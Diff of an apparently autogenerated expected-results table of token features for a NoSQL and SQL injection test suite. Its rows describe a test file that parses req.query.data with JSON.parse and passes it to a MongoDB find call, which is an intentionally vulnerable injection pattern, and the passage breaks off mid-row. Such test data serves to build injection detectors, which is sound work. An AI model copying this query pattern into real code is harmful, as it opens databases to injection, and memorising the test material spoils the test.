autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | exceptional return of JSON.pa ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:28:50:32 | parse | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:28:50:32 | parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:28:50:32 | parse | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:28:50:32 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:28:50:32 | parse | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:36 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:36 | req | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:36 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:36 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:36 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:42 | req.query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:42 | req.query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:42 | req.query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:42 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:42 | req.query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | contextFunctionInterfaces | validate(x) | @@ -814,6 +4564,101 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:34:50:47 | req.query.data | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:38:50:42 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:38:50:42 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:38:50:42 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:38:50:42 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:38:50:42 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:44:50:47 | data | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:44:50:47 | data | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:44:50:47 | data | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:44:50:47 | data | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:44:50:47 | data | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:22 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:22 | validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:22 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:22 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:22 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validat ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validat ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validat ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validat ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validat ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:15:51:50 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:34 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:34 | joiSchema | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:34 | joiSchema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:34 | joiSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:34 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:43 | joiSchema.validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:43 | joiSchema.validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:43 | joiSchema.validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:43 | joiSchema.validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:43 | joiSchema.validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | exceptional return of joiSche ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | exceptional return of joiSche ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | exceptional return of joiSche ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | exceptional return of joiSche ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | exceptional return of joiSche ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | joiSche ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | joiSche ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | joiSche ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | joiSche ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:26:51:50 | joiSche ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:36:51:43 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:36:51:43 | validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:36:51:43 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:36:51:43 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:51:36:51:43 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:13:52:27 | !validate.error | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:13:52:27 | !validate.error | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:13:52:27 | !validate.error | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:13:52:27 | !validate.error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:13:52:27 | !validate.error | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:21 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:21 | validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:21 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:21 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:21 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:27 | validate.error | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:27 | validate.error | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:27 | validate.error | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:27 | validate.error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:14:52:27 | validate.error | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:23:52:27 | error | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:23:52:27 | error | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:23:52:27 | error | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:23:52:27 | error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:52:23:52:27 | error | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:13:53:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:17:53:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:17:53:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:17:53:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:17:53:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:17:53:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | contextFunctionInterfaces | validate(x) | @@ -822,6 +4667,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:53:22:53:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:13:55:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:17:55:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:17:55:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:17:55:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:17:55:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:17:55:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | contextFunctionInterfaces | validate(x) | @@ -830,6 +4700,61 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:55:22:55:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:13:58:48 | await j ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:13:58:48 | await j ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:13:58:48 | await j ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:13:58:48 | await j ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:13:58:48 | await j ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:27 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:27 | joiSchema | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:27 | joiSchema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:27 | joiSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:27 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:41 | joiSche ... teAsync | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:41 | joiSche ... teAsync | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:41 | joiSche ... teAsync | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:41 | joiSche ... teAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:41 | joiSche ... teAsync | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | exceptional return of joiSche ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | exceptional return of joiSche ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | exceptional return of joiSche ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | exceptional return of joiSche ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | exceptional return of joiSche ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | joiSche ... (query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | joiSche ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | joiSche ... (query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | joiSche ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:19:58:48 | joiSche ... (query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:29:58:41 | validateAsync | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:29:58:41 | validateAsync | contextSurroundingFunctionParameters | 